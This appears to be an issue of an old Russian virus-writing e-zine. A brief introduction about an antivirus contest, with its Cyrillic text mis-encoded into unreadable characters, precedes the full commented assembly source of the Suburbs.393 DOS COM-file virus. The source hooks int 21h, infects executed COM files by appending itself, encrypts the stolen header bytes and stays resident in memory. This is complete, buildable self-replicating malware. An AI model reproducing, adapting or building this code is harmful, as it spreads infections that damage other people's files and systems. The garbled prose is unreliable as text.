²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²
²²²ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿²²²²
²²²³                                       Ü Ü                            ³°°²²
²²²³ ÜÛÛÜ ÜÛÛÜ  Û Û  ÜßßÜ Û  Û Û  Û ÛÞÝÛ  ÜÜÛÜÜ ÜÛÛÜ ÛßßÜ Û Û Û ÜßßÛ ÜßßÛ ³°°²²
²²²³ ÜÜÜÛ ÛÜÜÜ Û Û Û Û    Û  Û Û  Û Û  Û  Û Û Û ÛÜÜÜ Û  Û Û Û Û Û  Û Û  Û ³°°²²
²²²³ ÜÜÜÛ ÛÜÜÜ Û Û Û Û  Ü ÛÜß  Û  Û Û  Û  ÛÜÛÜÛ ÛÜÜÜ Ûßß  ßÜßÜß ÛÜÜÛ Û  Û ³°°²²
²²²³  ßß   ßß  ß ß ß  ßß  ß ßß  ßßß  ßßß    ß    ßß  ß     ß ß  ß  ß ß  ß ³°°²²
²²²ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´°°²²
²²²³                            ‚ ë ¯ ã á ª ù1ù                           ³°°²²
²²²ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°°²²
²²²²²°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°²²
²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²

          ¯¨á ­¨¥  ­â¨¢¨àãá  ¤«ï ¯à®áâ®£® COM-¢¨àï.


    à¥¤áâ ¢«¥­­ë¥ ¢ ¤ ­­®¬ ­®¬¥à¥  ­â¨¢¨àãáë,ï¢«ïîâáï ¯®¡¥¤¨-
â¥«ï¬¨ ª®­ªãàá  ¯à®å®¤¨¢è¥£® ¢ ª®­æ¥ ¯à®è«®£® 1997 £®¤  ¢ ª®­-
ä¥à¥­æ¨¨ rel.comp.virus.  „«ï ¯¥à¢®£® íâ ¯  ¡ë« ¢ë¡à ­ ¯à®áâ®©
RC-¢¨àãá Suburbs.393 ¨§ ¦ãà­ «  SLAM. ‘ ¬¨  ­â¨¢¨àãáë á ¨áå®¤-
­ë¬¨ â¥ªáâ ¬¨ «¥¦ â ¢ ¤¨à¥ªâ®à¨¨ FILE/.  ¥à¨â¥,®¡ãç ©â¥áì,¯¨-
è¨â¥ «ãçè¥ ¨ ¯à¨áë« ©â¥ ­ ¬.


Suburbs/SLAM -
    ­¥®¯ á­ë© COM-¢¨àãá.  à¨  § ¯ãáª¥  ¯® 4Bh ¯®à ¦ ¥â â®«ìª®
COM-ä ©«ë, ­¥ ¨¬¥îé¨¥ ¢ ­ ç «¥ ª®¬ ­¤ë JMP, â ª ª ª ¨á¯®«ì§ã¥â
¥¥ ª ª ¨­¤¨ª â®à § à ¦¥­­®áâ¨.  ‚ ¯ ¬ïâ¨ ¦¨¢¥â ¢® ¢â®à®© ¯®«®-
¢¨­¥ â ¡«¨æë ¯à¥àë¢ ­¨©. „®¯¨áë¢ ¥âáï ¢ ª®­¥æ ¯®à ¦ ¥¬®£® ä ©-
« , á®åà ­ïï ¯¥à¢ë¥ âà¨ ¡ ©â  ¢ á¢®¥¬ â¥«¥ ¢ § è¨äà®¢ ­­®¬ ¢¨-
¤¥.
                                               Text by ReCoder


PAGE  59,132                           Commented by Populizer

;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ                                                                      ÛÛ
;ÛÛ                             SUBURBS                                  ÛÛ
;ÛÛ                                                                      ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ

.386c

.487
d_0000_0084_e   equ     84h
d_0020_0000_e   equ     0                       ;*
d_0020_0174_e   equ     174h                    ;*
d_0020_0176_e   equ     176h                    ;*
d_0020_018A_e   equ     18Ah                    ;*
d_0020_018B_e   equ     18Bh                    ;*

                .model tiny
                .code
                org     100h
start:
                jmp     l_010B
                                                ;* No entry point to code
                and     al,24h                  ; '$'
                nop
                nop
                nop
                nop
                nop
                retn
l_010B:
                jmp     l_01FB
;--- ®¢ë© ®¡à ¡®âç¨ª int 24
                                                ;* No entry point to code
                mov     al,3
                iret
;--- ®¢ë© ®¡à ¡®âç¨ª int 21
                                                ;* No entry point to code
                cmp     ah,4Bh                  ; 'K'
                je      short l_0119
;--- ¥à¥å®¤ ­  ­ áâ®ïé¨© ®¡à ¡®âç¨ª int 21
                jmp     l_01F6
l_0119:
;--- ‡ à ¦¥­¨¥ ä ©«  ¯à¨ § ¯ãáª¥.
                pusha
                push    ds
                push    es
                mov     ax,4300h
                int     21h                     ; DOS Services  ah=function 43h
                                                ;  get attrb cx, filename @ds:dx
                push    cx
                push    ds
                push    dx
                mov     ax,4301h
                xor     cx,cx
                int     21h                     ; DOS Services  ah=function 43h
                                                ;  set attrb cx, filename @ds:dx
                mov     ax,3D02h
                int     21h                     ; DOS Services  ah=function 3Dh
                                                ;  open file, al=mode,name@ds:dx
                xchg    bx,ax
                mov     ax,20h
                mov     ds,ax
                mov     ds:d_0020_0174_e,bx
                mov     ax,3524h
                int     21h                     ; DOS Services  ah=function 35h
                                                ;  get intrpt vector al in es:bx
                push    es
                push    bx
                mov     ax,2524h
;*              mov     dx,offset l_0020_0003   ;*
                db      0BAh, 03h, 00h
                int     21h                     ; DOS Services  ah=function 25h
                                                ;  set intrpt vector al to ds:dx
                mov     bx,ds:d_0020_0174_e
                mov     ax,5700h
                int     21h                     ; DOS Services  ah=function 57h
                                                ;  get file date+time, bx=handle
                                                ;   returns cx=time, dx=time
                push    dx
                push    cx
                mov     ah,3Fh                  ; '?'
                mov     dx,d_0020_0174_e
                mov     cx,3
                int     21h                     ; DOS Services  ah=function 3Fh
                                                ;  read file, bx=file handle
                                                ;   cx=bytes to ds:dx buffer
                jnc     short l_0162
                jmp     short l_01D9
l_0162:
;--- à®¢¥àª  ­  EXE ä ©«
                cmp     word ptr ds:d_0020_0174_e,5A4Dh
                je      short l_01D9
                cmp     word ptr ds:d_0020_0174_e,4D5Ah
                je      short l_01D9
                mov     ax,4200h
                xor     cx,cx
                mov     dx,word ptr ds:d_0020_0174_e+1
;*              add     dx,3
                db       83h,0C2h, 03h
                int     21h                     ; DOS Services  ah=function 42h
                                                ;  move file ptr, bx=file handle
                                                ;   al=method, cx,dx=offset
                mov     ah,3Fh                  ; '?'
                mov     dx,d_0020_018B_e
                mov     cx,3
                int     21h                     ; DOS Services  ah=function 3Fh
                                                ;  read file, bx=file handle
                                                ;   cx=bytes to ds:dx buffer
;--- à¨§­ ª § à ¦¥­¨ï E9 ¯¥à¢ë© ¡ ©â.
                cmp     byte ptr ds:d_0020_018B_e,0E9h
                je      short l_01D9
                xor     byte ptr ds:d_0020_0174_e,21h   ; '!'
                xor     byte ptr ds:d_0020_0174_e+1,85h
                xor     byte ptr ds:d_0020_0176_e,2Dh   ; '-'
                mov     ax,4202h
                xor     cx,cx
                xor     dx,dx
                int     21h                     ; DOS Services  ah=function 42h
                                                ;  move file ptr, bx=file handle
                                                ;   al=method, cx,dx=offset
                mov     bp,ax
                mov     ah,40h                  ; '@'
                xor     dx,dx
                mov     cx,189h
                int     21h                     ; DOS Services  ah=function 40h
                                                ;  write file  bx=file handle
                                                ;   cx=bytes from ds:dx buffer
                jc      short l_01D9
                mov     ax,4200h
                xor     cx,cx
                xor     dx,dx
                int     21h                     ; DOS Services  ah=function 42h
                                                ;  move file ptr, bx=file handle
                                                ;   al=method, cx,dx=offset
                mov     si,18Ah
                mov     byte ptr ds:d_0020_018A_e,0E9h
                mov     ax,bp
                sub     ax,3
                mov     ds:d_0020_018B_e,ax
                mov     dx,d_0020_018A_e
                mov     ah,40h                  ; '@'
                mov     cx,3
                int     21h                     ; DOS Services  ah=function 40h
                                                ;  write file  bx=file handle
                                                ;   cx=bytes from ds:dx buffer
l_01D9:
                mov     ax,5701h
                pop     cx
                pop     dx
                int     21h                     ; DOS Services  ah=function 57h
                                                ;  set file date+time, bx=handle
                                                ;   cx=time, dx=time
                mov     ah,3Eh
                int     21h                     ; DOS Services  ah=function 3Eh
                                                ;  close file, bx=file handle
                pop     dx
                pop     ds
                mov     ax,2524h
                int     21h                     ; DOS Services  ah=function 25h
                                                ;  set intrpt vector al to ds:dx
                mov     ax,4301h
                pop     dx
                pop     ds
                pop     cx
                int     21h                     ; DOS Services  ah=function 43h
                                                ;  set attrb cx, filename @ds:dx
                pop     es
                pop     ds
                popa
l_01F6:
                jmp     far ptr $-1F6h
l_01FB:
                pushad
                push    ds
                push    es
                mov     di,ds
                mov     ax,20h
                mov     ds,ax
;--- à®¢¥àª  ¨­áâ «ïæ¨¨ ¢ ¯ ¬ïâ¨
                cmp     word ptr ds:d_0020_0000_e,0
                jne     short l_0257
;--- ‡ à ¦¥­¨¥ ¯ ¬ïâ¨
                mov     ds,di
                xor     ax,ax
                mov     es,ax
                mov     di,d_0000_0084_e
                mov     ax,es:[di]
                mov     bx,es:[di+2]

                mov     si,word ptr ds:[101h]
                add     si,1EFh
;--- ‡ ¯®¬­¨âì áâ à®¥ §­ ç¥­¨¥ int 21
                mov     cs:[si],ax
                mov     cs:[si+2],bx
                xor     ax,ax
                mov     di,ax
                mov     si,word ptr ds:[101h]
                add     si,103h
                push    cs
                pop     ds
;--- ¥à¥­¥áâ¨ â¥«® ¢ â ¡«¨æã ¢¥ªâ®à®¢ 20:0
                mov     ax,20h
                mov     es,ax
                mov     cx,189h
                rep     movsb
                xor     ax,ax
                mov     es,ax
;--- “áâ ­®¢¨âì ­®¢®¥ §­ ç¥­¨¥ ¢¥ªâ®à  int 21 -> 0020:0006
                mov     di,d_0000_0084_e
                mov     word ptr es:[di],6
                mov     ax,20h
                mov     es:[di+2],ax
l_0257:
                mov     ax,cs
                mov     ds,ax
                mov     es,ax
;--- „«ï  ¢â®¬ â¨ç¥áª®£® «¥ç¥­¨ï ¢¨àãá  ­¥®¡å®¤¨¬® ¯¥à¥¤ âì ã¯à ¢«¥­¨¥ ¢
;--- íâã â®çªã.
;--- „«ï àãç­®£® «¥ç¥­¨ï ­ã¦­® à áè¨äà®¢ë¢ âì ¡ ©âë ¨ § ¯¨áë¢ âì ¨å
;--- ®  ¤à¥áã 0 ¤«ï COM ä ©«®¢.
                mov     si,word ptr ds:[101h]
                add     si,277h
;---  áè¨äà®¢ âì ®à¨£¨­ «ì­ë¥ ¡ ©âë
                xor     byte ptr [si],21h       ; '!'
                xor     byte ptr [si+1],85h
                xor     byte ptr [si+2],2Dh     ; '-'
;--- ‡ ¯¨á âì ®à¨£¨­ «ì­ë¥ ¡ ©âë ¯®  ¤à¥áã cs:100
                mov     di,100h
                mov     cx,3
                rep     movsb
                pop     es
                pop     ds
                popa
l_027B:
                push    offset start
                retn
;--- ‡ è¨äà®¢ ­­ë¥ ®à¨£¨­ «ì­ë¥ ¡ ©âë -> 90 90 90
                db      0B1h, 15h,0BDh
                db      '[VD/SLAM]'
                db       00h, 53h, 75h, 62h, 75h, 72h
                db       62h, 73h, 00h
                end
